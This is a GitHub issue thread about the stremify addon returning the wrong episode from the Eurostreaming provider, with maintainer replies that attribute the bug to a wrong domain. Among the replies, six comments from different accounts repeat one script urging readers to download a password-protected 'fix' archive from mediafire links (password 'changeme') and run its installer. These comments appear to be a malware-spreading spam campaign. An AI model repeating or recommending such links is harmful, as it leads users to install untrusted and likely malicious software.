### ISSUE TITLE
Wrong Result for Rebellion, Eurostreaming, IMDB/TMDB Based. 

### ISSUE THREAD

**Issue by UrloMythus** [stremify/stremify#39]
Hello, I just wanted to report that Stremify finds the wrong result for tt4699982, Rebellion. Instead of the first episode, it finds an episode of Emily in Paris. 
That is weird since the search itself, on the website, with the IMDB, work as expected. Moreover, the video file on the site is what it is supposed to be. 
https://eurostreaming.my/stream/3196-rebellion-streaming.html

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by infvortx** [comment]
I am pretty sure Eurostreaming is intentionally doing it because it does it on all shows. I’ll swap them for another provider or rewrite the scraper soon.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by infvortx** [comment]
Fixed, eurostreaming had a wrong domain haha.

**Comment by vitouchiha** [comment]
Tried now on TV Series "Snowpiercer 4x01" and also appears emily in paris
